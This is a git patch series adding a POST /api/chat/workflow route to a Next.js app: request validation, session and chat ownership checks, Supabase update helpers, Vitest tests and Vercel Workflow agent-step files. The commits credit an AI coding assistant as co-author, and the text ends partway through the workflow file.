From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 09:24:00 -0500 Subject: [PATCH 1/5] feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub- header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f650) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/api/chat/workflow/route.ts | 34 ++++ .../handleChatWorkflowStream.test.ts | 165 ++++++++++++++++++ .../__tests__/validateChatWorkflow.test.ts | 142 +++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 61 +++++++ lib/chat/validateChatWorkflow.ts | 61 +++++++ 5 files changed, 463 insertions(+) create mode 100644 app/api/chat/workflow/route.ts create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts create mode 100644 lib/chat/handleChatWorkflowStream.ts create mode 100644 lib/chat/validateChatWorkflow.ts diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts new file mode 100644 index 000000000..19445c03b --- /dev/null +++ b/app/api/chat/workflow/route.ts @@ -0,0 +1,34 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; + +export const maxDuration = 800; + +/** + * OPTIONS handler for CORS preflight requests. + * + * @returns A NextResponse with CORS headers. + */ +export async function OPTIONS() { + return new NextResponse(null, { + status: 200, + headers: getCorsHeaders(), + }); +} + +/** + * POST /api/chat/workflow + * + * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing + * session + chat. Currently returns a hardcoded UIMessage stream stub — + * the workflow is wired up in a follow-up PR. + * + * Contract: https://developers.recoupable.com/api-reference/chat/workflow + * + * @param request - The incoming NextRequest. + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function POST(request: NextRequest): Promise { + return handleChatWorkflowStream(request); +} diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts new file mode 100644 index 000000000..c61911be8 --- /dev/null +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -0,0 +1,165 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; + +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ + validateChatWorkflow: vi.fn(), +})); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ + selectSessions: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ + selectChats: vi.fn(), +})); +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ + isSandboxActive: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; + +function makeRequest(): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "test-key", "content-type": "application/json" }, + body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }), + }); +} + +function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { + vi.mocked(validateChatWorkflow).mockResolvedValue({ + messages: [], + chatId: CHAT_ID, + sessionId: SESSION_ID, + accountId: overrides.accountId ?? ACCOUNT_ID, + orgId: null, + authToken: "test-key", + }); +} + +function mockOwnedSessionWithActiveSandbox() { + mockValidatedRequest(); + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); + vi.mocked(isSandboxActive).mockReturnValue(true); +} + +describe("handleChatWorkflowStream (stub)", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + describe("validation short-circuits", () => { + it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(authError); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(401); + }); + + it("returns the validator's 400 unchanged (e.g. invalid body)", async () => { + const badBody = NextResponse.json( + { status: "error", error: "Invalid JSON body" }, + { status: 400 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + }); + }); + + describe("session / chat ownership", () => { + beforeEach(() => mockValidatedRequest()); + + it("returns 404 when the session does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 500 when selectSessions errors (returns null)", async () => { + vi.mocked(selectSessions).mockResolvedValue(null); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + }); + + it("returns 403 when the session is owned by a different account", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(403); + }); + + it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(false); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + const body = await res.json(); + expect(body.error).toMatch(/sandbox/i); + }); + + it("returns 404 when the chat does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 404 when chat exists but belongs to a different session", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([ + { id: CHAT_ID, session_id: "different-session" } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + }); + + describe("success (stub response)", () => { + beforeEach(() => mockOwnedSessionWithActiveSandbox()); + + it("returns 200 with text/event-stream content type", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("sets an x-workflow-run-id response header starting with stub-", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const runId = res.headers.get("x-workflow-run-id"); + expect(runId).toBeTruthy(); + expect(runId!.startsWith("stub-")).toBe(true); + }); + + it("emits a stream body that includes the stub assistant text", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const text = await res.text(); + expect(text).toContain("Hello from /api/chat/workflow"); + }); + }); +}); diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts new file mode 100644 index 000000000..8eb9457c2 --- /dev/null +++ b/lib/chat/__tests__/validateChatWorkflow.test.ts @@ -0,0 +1,142 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; + +vi.mock("@/lib/auth/validateAuthContext", () => ({ + validateAuthContext: vi.fn(), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; + +const validBody = { + messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }], + chatId: CHAT_ID, + sessionId: SESSION_ID, +}; + +function makeRequest(body: unknown = validBody): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: typeof body === "string" ? body : JSON.stringify(body), + }); +} + +function mockAuthOk() { + vi.mocked(validateAuthContext).mockResolvedValue({ + accountId: ACCOUNT_ID, + orgId: null, + authToken: "k", + }); +} + +describe("validateChatWorkflow", () => { + beforeEach(() => vi.clearAllMocks()); + + describe("valid input", () => { + beforeEach(() => mockAuthOk()); + + it("returns the validated body augmented with accountId / orgId / authToken", async () => { + const result = await validateChatWorkflow(makeRequest()); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.chatId).toBe(CHAT_ID); + expect(result.sessionId).toBe(SESSION_ID); + expect(result.messages).toEqual(validBody.messages); + expect(result.accountId).toBe(ACCOUNT_ID); + expect(result.orgId).toBe(null); + expect(result.authToken).toBe("k"); + }); + + it("accepts an optional context.contextLimit integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: 50 } }), + ); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.context?.contextLimit).toBe(50); + }); + + it("accepts an empty messages array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] })); + expect(result).not.toBeInstanceOf(NextResponse); + }); + }); + + describe("invalid body", () => { + it("returns 400 when JSON is malformed", async () => { + const req = new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: "{not-json", + }); + const result = await validateChatWorkflow(req); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is missing", async () => { + const { chatId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when sessionId is missing", async () => { + const { sessionId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when messages is not an array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is empty string", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when context.contextLimit is not an integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: "fifty" } }), + ); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("does not call validateAuthContext when body validation fails", async () => { + const { chatId: _omit, ...rest } = validBody; + await validateChatWorkflow(makeRequest(rest)); + expect(validateAuthContext).not.toHaveBeenCalled(); + }); + }); + + describe("auth", () => { + it("returns the auth short-circuit response when validateAuthContext rejects", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateAuthContext).mockResolvedValue(authError); + const result = await validateChatWorkflow(makeRequest()); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(401); + }); + }); +}); diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts new file mode 100644 index 000000000..137f699cb --- /dev/null +++ b/lib/chat/handleChatWorkflowStream.ts @@ -0,0 +1,61 @@ +import { NextRequest, NextResponse } from "next/server"; +import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import generateUUID from "@/lib/uuid/generateUUID"; + +/** + * Handles POST /api/chat/workflow. + * + * Stub implementation: delegates auth + body validation to validateChatWorkflow, + * verifies ownership of the referenced session + chat, confirms the session's + * sandbox is active, then returns a hardcoded UIMessage stream with an + * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive + * the agent loop is wired up in a follow-up PR — this stub exists so clients + * can integrate against the contract documented at + * /api-reference/chat/workflow. + * + * @param request - The incoming NextRequest + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function handleChatWorkflowStream(request: NextRequest): Promise { + const validated = await validateChatWorkflow(request); + if (validated instanceof NextResponse) return validated; + + const sessions = await selectSessions({ id: validated.sessionId }); + if (sessions === null) return errorResponse("Internal server error", 500); + const session = sessions[0]; + if (!session) return errorResponse("Session not found", 404); + if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403); + if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400); + + const chats = await selectChats({ id: validated.chatId }); + const chat = chats[0]; + if (!chat || chat.session_id !== validated.sessionId) { + return errorResponse("Chat not found", 404); + } + + const runId = `stub-${generateUUID()}`; + + const stream = createUIMessageStream({ + generateId: generateUUID, + execute: ({ writer }) => { + const id = generateUUID(); + writer.write({ type: "text-start", id }); + writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); + writer.write({ type: "text-end", id }); + }, + }); + + return createUIMessageStreamResponse({ + stream, + headers: { + ...getCorsHeaders(), + "x-workflow-run-id": runId, + }, + }); +} diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts new file mode 100644 index 000000000..4fd8e6c66 --- /dev/null +++ b/lib/chat/validateChatWorkflow.ts @@ -0,0 +1,61 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { z } from "zod"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { validationErrorResponse } from "@/lib/zod/validationErrorResponse"; + +export const chatWorkflowBodySchema = z.object({ + messages: z.array(z.any()), + chatId: z.string().min(1, "chatId is required"), + sessionId: z.string().min(1, "sessionId is required"), + context: z + .object({ + contextLimit: z.number().int("contextLimit must be an integer"), + }) + .optional(), +}); + +export type ChatWorkflowBody = z.infer; + +export type ChatWorkflowRequest = ChatWorkflowBody & { + accountId: string; + orgId: string | null; + authToken?: string; +}; + +/** + * Validates a POST /api/chat/workflow request end-to-end: parses the JSON + * body, validates it against the schema, and runs auth via + * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403) + * or the typed body augmented with the authenticated accountId / orgId / token. + * + * @param request - The incoming NextRequest. + * @returns A NextResponse error or the validated, auth-augmented request. + */ +export async function validateChatWorkflow( + request: NextRequest, +): Promise { + let rawBody: unknown; + try { + rawBody = await request.json(); + } catch { + return errorResponse("Invalid JSON body", 400); + } + + const parsed = chatWorkflowBodySchema.safeParse(rawBody); + if (!parsed.success) { + const firstError = parsed.error.issues[0]; + return validationErrorResponse(firstError.message, firstError.path); + } + + const auth = await validateAuthContext(request); + if (auth instanceof NextResponse) return auth; + + return { + ...parsed.data, + accountId: auth.accountId, + orgId: auth.orgId, + authToken: auth.authToken, + }; +} From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 12:07:35 -0500 Subject: [PATCH 2/5] feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-`) are replaced with real ones (`wrun_`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org--` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 55 ++++ app/lib/workflows/runAgentWorkflow.ts | 56 ++++ .../compareAndSetChatActiveStreamId.test.ts | 51 +++ .../handleChatWorkflowStream.test.ts | 301 ++++++++++++++---- .../__tests__/maybeResumeChatStream.test.ts | 46 +++ .../persistLatestUserMessage.test.ts | 129 ++++++++ .../reconcileExistingActiveStream.test.ts | 92 ++++++ lib/chat/agentCustomInstructions.ts | 9 + lib/chat/assistantFileLinks.ts | 28 ++ lib/chat/compareAndSetChatActiveStreamId.ts | 49 +++ lib/chat/handleChatWorkflowStream.ts | 100 ++++-- lib/chat/maybeResumeChatStream.ts | 40 +++ lib/chat/persistLatestUserMessage.ts | 84 +++++ lib/chat/reconcileExistingActiveStream.ts | 56 ++++ lib/chat/recoupApiSkillPrompt.ts | 11 + lib/recoupable/__tests__/extractOrgId.test.ts | 57 ++++ lib/recoupable/extractOrgId.ts | 31 ++ .../__tests__/selectChatMessages.test.ts | 58 ++++ .../__tests__/upsertChatMessage.test.ts | 46 +++ .../chat_messages/selectChatMessages.ts | 40 +++ .../chat_messages/upsertChatMessage.ts | 37 +++ .../chats/__tests__/updateChat.test.ts | 110 +++++++ lib/supabase/chats/updateChat.ts | 86 +++++ 23 files changed, 1478 insertions(+), 94 deletions(-) create mode 100644 app/lib/workflows/runAgentStep.ts create mode 100644 app/lib/workflows/runAgentWorkflow.ts create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts create mode 100644 lib/chat/agentCustomInstructions.ts create mode 100644 lib/chat/assistantFileLinks.ts create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts create mode 100644 lib/chat/maybeResumeChatStream.ts create mode 100644 lib/chat/persistLatestUserMessage.ts create mode 100644 lib/chat/reconcileExistingActiveStream.ts create mode 100644 lib/chat/recoupApiSkillPrompt.ts create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts create mode 100644 lib/recoupable/extractOrgId.ts create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts create mode 100644 lib/supabase/chats/updateChat.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts new file mode 100644 index 000000000..352dcd265 --- /dev/null +++ b/app/lib/workflows/runAgentStep.ts @@ -0,0 +1,55 @@ +import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; +import { gateway } from "@ai-sdk/gateway"; +import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; + +export type RunAgentStepInput = { + messages: UIMessage[]; + modelId: string; + writable: WritableStream; +}; + +/** + * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow + * `"use step"` so that: + * + * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. + * - The result is cached as a single durable event — replays after a crash + * do not re-bill the model. + * + * Currently emits a plain text response with no tools. Sandbox tools land in + * the follow-up PR (port `@open-harness/agent` tools + wire via + * `experimental_context`). + * + * @param input - Messages + selected model + the workflow's writable stream. + * @returns finishReason from the model run (for the workflow loop's break condition). + */ +export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { + "use step"; + + console.log("[runAgentStep] start", { + modelId: input.modelId, + messageCount: input.messages.length, + }); + + const modelMessages = convertToModelMessages(input.messages); + const result = streamText({ + model: gateway(input.modelId), + system: agentCustomInstructions, + messages: modelMessages, + }); + + // Acquire the writer once and release in `finally` — re-acquiring per chunk + // (the previous shape) leaked the lock when any write threw. + const writer = input.writable.getWriter(); + try { + for await (const part of result.toUIMessageStream()) { + await writer.write(part); + } + } finally { + writer.releaseLock(); + } + + const finishReason = await result.finishReason; + console.log("[runAgentStep] finish", { finishReason }); + return { finishReason }; +} diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts new file mode 100644 index 000000000..db679145a --- /dev/null +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -0,0 +1,56 @@ +import { getWritable } from "workflow"; +import type { UIMessage, UIMessageChunk } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +export type RunAgentWorkflowInput = { + messages: UIMessage[]; + chatId: string; + sessionId: string; + modelId: string; +}; + +/** + * Vercel Workflow that drives the chat agent loop. The route handler calls + * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the + * client; this function writes UIMessage chunks into the workflow's writable + * via 